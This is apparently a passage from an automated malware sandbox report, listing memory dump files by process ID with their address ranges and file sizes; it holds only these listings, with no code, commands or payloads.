memory/780-140-0x0000000001134000-0x0000000001137000-memory.dmpFilesize
12KB
-
memory/780-157-0x0000000001134000-0x0000000001137000-memory.dmpFilesize
12KB
-
memory/780-158-0x000000000113B000-0x000000000115A000-memory.dmpFilesize
124KB
-
memory/780-139-0x000007FEF3C60000-0x000007FEF47BD000-memory.dmpFilesize
11.4MB
-
memory/780-141-0x000000000113B000-0x000000000115A000-memory.dmpFilesize
124KB
-
memory/780-84-0x0000000000000000-mapping.dmp
-
memory/780-136-0x0000000000000000-mapping.dmp
-
memory/808-145-0x0000000000000000-mapping.dmp
-
memory/840-134-0x0000000000000000-mapping.dmp
-
memory/876-79-0x0000000000000000-mapping.dmp
-
memory/900-86-0x00000000023A4000-0x00000000023A7000-memory.dmpFilesize
12KB
-
memory/900-87-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmpFilesize
11.4MB
-
memory/900-74-0x0000000000000000-mapping.dmp
-
memory/900-154-0x0000000000000000-mapping.dmp
-
memory/900-91-0x000000001B6E0000-0x000000001B9DF000-memory.dmpFilesize
3.0MB
-
memory/900-98-0x00000000023AB000-0x00000000023CA000-memory.dmpFilesize
124KB
-
memory/900-96-0x00000000023AB000-0x00000000023CA000-memory.dmpFilesize
124KB
-
memory/900-97-0x00000000023A4000-0x00000000023A7000-memory.dmpFilesize
12KB
-
memory/912-153-0x0000000000000000-mapping.dmp
-
memory/1000-80-0x0000000000000000-mapping.dmp
-
memory/1044-162-0x0000000000000000-mapping.dmp
-
memory/1092-94-0x0000000000000000-mapping.dmp
-
memory/1164-142-0x0000000000000000-mapping.dmp
-
memory/1164-89-0x0000000000000000-mapping.dmp
-
memory/1212-109-0x0000000000000000-mapping.dmp
-
memory/1240-73-0x0000000000000000-mapping.dmp
-
memory/1252-151-0x0000000000000000-mapping.dmp
-
memory/1268-81-0x0000000000000000-mapping.dmp
-
memory/1272-95-0x0000000000000000-mapping.dmp
-
memory/1272-147-0x0000000000000000-mapping.dmp
-
memory/1312-133-0x0000000000000000-mapping.dmp
-
memory/1352-78-0x0000000000000000-mapping.dmp
-
memory/1412-72-0x0000000000000000-mapping.dmp
-
memory/1496-159-0x00000001400014E0-mapping.dmp
-
memory/1500-132-0x0000000000EEB000-0x0000000000F0A000-memory.dmpFilesize
124KB
-
memory/1500-124-0x0000000000000000-mapping.dmp
-
memory/1500-131-0x0000000000EE4000-0x0000000000EE7000-memory.dmpFilesize
12KB
-
memory/1500-130-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmpFilesize
11.4MB
-
memory/1504-149-0x0000000000000000-mapping.dmp
-
memory/1532-148-0x0000000000000000-mapping.dmp
-
memory/1540-150-0x0000000000000000-mapping.dmp
-
memory/1560-163-0x00000001407F25D0-mapping.dmp
-
memory/1560-166-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1560-167-0x00000000001B0000-0x00000000001D0000-memory.dmpFilesize
128KB
-
memory/1560-168-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1564-160-0x0000000000000000-mapping.dmp
-
memory/1572-117-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-115-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-127-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-128-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1572-123-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1572-122-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-113-0x0000000000000000-mapping.dmp
-
memory/1572-118-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-164-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-119-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-120-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-116-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1572-165-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1644-103-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1644-54-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-57-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-59-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1644-101-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-68-0x0000000077000000-0x00000000771A9000-memory.dmpFilesize
1.7MB
-
memory/1644-61-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-55-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-58-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-60-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1644-67-0x000000013F4C0000-0x00000001401C0000-memory.dmpFilesize
13.0MB
-
memory/1700-156-0x0000000000000000-mapping.dmp
-
memory/1720-108-0x000000000276B000-0x000000000278A000-memory.dmpFilesize
124KB
-
memory/1720-105-0x000007FEF3C60000-0x000007FEF47BD000-memory.dmpFilesize
11.4MB
-
memory/1720-111-0x000000000276B000-0x000000000278A000-memory.dmpFilesize
124KB
-
memory/1720-110-0x0000000002764000-0x0000000002767000-memory.dmpFilesize
12KB
-
memory/1720-106-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/1720-99-0x0000000000000000-mapping.dmp
-
memory/1720-107-0x0000000002764000-0x0000000002767000-memory.dmpFilesize
12KB
-
memory/1780-88-0x0000000000000000-mapping.dmp
-
memory/1816-77-0x0000000000000000-mapping.dmp
-
memory/1824-161-0x0000000000000000-mapping.dmp
-
memory/1868-82-0x0000000000000000-mapping.dmp
-
memory/1924-75-0x0000000000000000-mapping.dmp
-
memory/1952-90-0x0000000000000000-mapping.dmp
-
memory/1972-126-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/1972-121-0x000000013F1F0000-0x000000013FEF0000-memory.dmpFilesize
13.0MB
-
memory/2000-143-0x0000000000000000-mapping.dmp
-
memory/2044-155-0x0000000000000000-mapping.dmp